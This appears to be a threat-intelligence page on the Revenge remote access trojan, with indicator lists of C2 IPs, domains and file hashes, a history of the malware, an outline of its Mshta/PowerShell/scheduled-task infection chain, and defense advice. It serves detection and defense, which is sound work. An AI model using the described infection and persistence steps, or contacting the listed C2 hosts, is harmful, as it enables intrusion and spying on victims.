Revenge

39
Global rank
36
Month rank
43
Week rank
5049
IOCs

Revenge was one of the most popular remote access trojans to be used in 2019 when it was featured in a huge malicious campaign named “Aggah”. This malware can take remote control of infected machines and spy after the victims.

Trojan
Type
Unknown
Origin
1 January, 2016
First seen
29 May, 2023
Last seen

How to analyze Revenge with ANY.RUN

Trojan
Type
Unknown
Origin
1 January, 2016
First seen
29 May, 2023
Last seen

IOCs

IP addresses
3.142.167.4
209.25.141.181
209.25.141.212
209.25.141.223
18.136.148.247
18.139.9.214
18.141.129.246
18.158.249.75
3.125.223.134
3.124.142.205
3.17.7.232
3.14.182.203
3.134.125.175
192.169.69.25
79.134.225.43
3.13.191.225
178.17.174.71
3.22.30.40
91.233.116.105
52.14.18.129
Hashes
fd775cdb2dc7c7fe6315e06da2e80fa20a68adfe084dbf62ac0f0a2c7f7b7313
9e226a071230aca40f994bc701b08bb7856126a7667366efc91d07bf5bf3e4c8
3b20a5138d7c86e7692a224715f8f0b3801b1319e12a0dd2c8b0515d428d4aa6
8779e82985a769f64109d6ec15a8cf4aa77c3f4d290bd8feacc1703fe642a495
d878b970db2050760a9df255ab179699e7d7df948993d660ef91b17482f93fd7
b47eed224ce0c75e09dbdabc3b30845193a9c2d20028cbbe2ad9abb2d4c98ae0
1f5889e548da00050ecff6aac16370f3ef04b0b3e08671ca72cc82238dc0e066
53afd7e9d6f7b899c9349a8d8cd2e05f35c58edb3d775752b5ebaac96a80edf7
71083b495c08c9e4c97ddfb810dfaeaef26dbfb2483bf54c0d52f2183d45455b
1f227730e450816300f82d5eb1486f38c71e72c80a4c3c1e20cc080a757cc9fa
2020280ab143490fa93e2875e29852085c861a3c7ea8459e04364776a6c61f7e
8592f2d843140a8331c0cb45f038970c43e0f32aaac5a372e2c9e45e963dc7c8
535b5dbc060a2b7d8db2fa83c0a368e3a9641b10b32c644e7db020c2a9176f34
56fde0361fbe192719b5c36b33f083fa2d62de8ab6fb8ecbd22345852d56327b
0809f21bd26085abd17c32f7feb355e8f2e8e0c0da8455239aab8d499c17a60d
9aa2017ccb2b910d067ff1da752b8fa01e5911dbbd5b8e21d7825a53ff98c4ea
dad6bf5196b7ac4ea0b2cb688f34cc46adc6ce26603d6953d1b8175b4582e314
547423fcd0fd56fddcc3fae4f364fd14a972f4704ec0babeb37cfde1dbadd49f
de2a4c37920e94bbcb2b261ec95b40a59fd1822d33b92dd544cd30740df769c6
01c360f398632aff5440af35382f4e6bdeb440bb29517637d80fe9bd5c556860
Domains
vcctggqm3t.dattolocal.net
elx01.knas.systems
192-168-100-240.otmn.direct.quickconnect.to
192-168-100-240.otmn.direct.quickconnect.to
joemclean.duckdns.org
microsoftfixer.duckdns.org
fevertoxs.duckdns.org
adenere.duckdns.org
fevertox.duckdns.org
countries-cite.at.ply.gg
when-enable.at.playit.gg
understand-recommendation.at.playit.gg
flowers-aberdeen.at.playit.gg
state-essays.at.playit.gg
age-pale.at.playit.gg
k-spirits.at.playit.gg
source-bodies.at.playit.gg
assessment-epinions.at.playit.gg
needs-unlike.at.playit.gg
apple-releases.at.playit.gg
Last Seen at

Recent blog posts

recentPost
How to Create a Task in ANY.RUN:a Step-by-Ste...
watchers 308
comments 0
recentPost
ChatGPT for SOC and Malware Analysis professi...
watchers 5384
comments 0
recentPost
Deobfuscating the Latest GuLoader: Automating...
watchers 3237
comments 3

What is Revenge Malware?

Revenge belongs to the class of Remote Access Trojans which means that it is usually used by the attackers to control infected PCs remotely or spy on the users by monitoring keystrokes and even computer surroundings through the remote webcam and microphone access.

Discovered for the first time in 2016, Revenge RAT continues to be a threat at the present day with a big spike in popularity monitored in 2019, when the malware was observed targeting corporations and government structures all around the world in a massive malicious campaign codenamed “Aggah”. Thanks to a large variety of distribution methods similar to ransomware, robust core feature-set, and solid persistence mechanisms, Revenge has become a popular choice for cybercriminals. The popularity of this RAT was further aided by its open-source nature – anybody can freely download Revenge on underground hacking forums and employ it in their own campaigns.

General description of Revenge

The Revenge RAT was first observed in the wild in June 2016, when it was released by a user with a nick Napoleon – an Arabic-speaking member of the underground hacking community.

The initial version of this malware was a simple malicious program that didn’t offer much, if any, code obfuscation and was mainly used by other Arabic-speaking cybercriminals. Despite the simplicity of the malware, at the time, only one out of 54 of VirusTotal scanners could pick up the malicious nature of the Revenge code, which confused the researchers bearing in mind the lack of anti-analysis techniques.

The creator used Visual Basic to develop this RAT and personally admitted that the malware was very bare-bones at the time of its initial release– providing only the most basic functions and definitely losing to competitors in terms of core feature-set. According to Napoleon, this explained why Revenge was available free of charge.

After two months since the initial release, a new version v0.2 was issued by the author, on a more popular hacking forum, this time with more features, but still offered completely free of charge. Since then Revenge has evolved even further and today, it offers cybercriminals a wide range of capabilities including remote files and registry alterations on an infected machine, access to memory, processes, and services as well as access to connected devices such as keyboards, webcams, and mice, allowing this malware to record the actions of its victims and collect information like banking credentials and social account data.

Core malicious feature-set was not the only thing that evolved over the course of the Revenge lifetime. Improvements in distribution and persistence made this threat truly a force to be reckoned with. In some campaigns, scripts were executed in the HTML of a custom Blogspot [com] page.

Revenge malware analysis

A video recorded in the ANY.RUN malware hunting service allows us to take a look at the execution of this malware as it unfolds and also other malicious programs like ransomware.

process graph of the revenge trojan execution Figure 1: Displays the lifecycle of Revenge in a visual form. A graph generated by ANY.RUN

text report of the revenge analysis Figure 2: Shows a customizable text report generated by the ANY.RUN malware analysis service which allows diving deeper into the details of the Revenge execution process.

Revenge execution process

Sometimes the first steps of Revenge trojan execution may vary depending on how it made its way into a victim's computer. The most common form of initial infiltration vector is by the use of Mshta.exe for downloading the payload or for direct execution from a URL. After the payload is delivered to the infected machine, Mshta.exe changes the autorun value in the registry and starts three processes - cmd.exe, powershell.exe and schtasks.exe. It starts cmd.exe to kill processes from a list, in the given example processes from the Microsoft Office packet were targeted. Powershell.exe is being launched to download the main payload. In turn, schtasks.exe is launched in a way to generate a scheduled task that provides Revenge persistence in the infected system. After all these steps, the malware is ready to complete commands from C2 servers.

How to avoid infection by Revenge?

The best line of defense against threats like Revenge RAT is to keep a security product installed and updated with the latest firmware. One should not disable native Windows security features, regularly update the OS and adhere to the best security practices of staying safe online.

As such, it is advised to stay clear of downloading email attachments from unknown senders and never enabling macros in Microsoft Office if prompted to do so by a file downloaded from a suspicious email. The same advice comes for other threats like Glupteba and Smoke Loader.

Distribution of Revenge

Revenge has been seen being distributed in a variety of ways the same as ransomware, some of which are potentially more effective than others. For example, Revenge is known to infect PCs from malicious email attachments and corrupted ads on compromised websites.

Most commonly, once delivered in the Microsoft Office file that was downloaded and launched by the potential victim, Revenge will use macros to connect to an outside domain, sometimes hidden on a web page, from which additional scripts and content are downloaded until the actual malware is installed on the PC.

How to detect Revenge RAT using ANY.RUN?

Analysts can get information about which MITRE ATT&CK™ MATRIX techniques were applied by malware. Just click on the "ATT&CK™ MATRIX " button.

Revenge MITRE ATT&CK MATRIX techniques Figure 3: Revenge MITRE ATT&CK MATRIX techniques

Conclusion

Revenge is no slouch when it comes to Remote Banking Trojans. It has begun its lifespan as a simplistic malware such as ransomware and without anti-analysis features but has evolved to become a capable and persistent trojan used in massive attacks in Europe, North America, Asia, and the Middle East.

The popularity of this malware is not only due to its robust feature-set, but also ready availability since Revenge can be downloaded for free from a number of underground communities.

Professionals can establish a secure cyber defense against Revenge and similar RATs and secure their corporate or government networks by reverse engineering and studying a threat using malware hunting services like to ANY.RUN.

HAVE A LOOK AT

Adwind screenshot
Adwind
adwind trojan
Adwind RAT, sometimes also called Unrecom, Sockrat, Frutas, jRat, and JSocket, is a Malware As A Service Remote Access Trojan that attackers can use to collect information from infected machines. It was one of the most popular RATs in the market in 2015.
Read More
Agent Tesla screenshot
Agent Tesla
agenttesla trojan rat stealer
Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.
Read More
Amadey screenshot
Amadey
amadey
Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks.
Read More
Arkei screenshot
Arkei
arkei stealer
Arkei is a stealer type malware capable of collecting passwords, autosaved forms, cryptocurrency wallet credentials, and files.
Read More
AsyncRAT screenshot
AsyncRAT
asyncrat
AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.
Read More
Ave Maria screenshot
Ave Maria
avemaria stealer trojan rat
Ave Maria malware is a Remote Access Trojan that is also called WARZONE RAT. Hackers use it to control the PCs of their victims remotely and steal information from infected PCs. For example, they can remotely activate the camera to take pictures of a victim and send them to a control server.
Read More

Our website uses cookies. By visiting the pages of the site, you agree to our Privacy Policy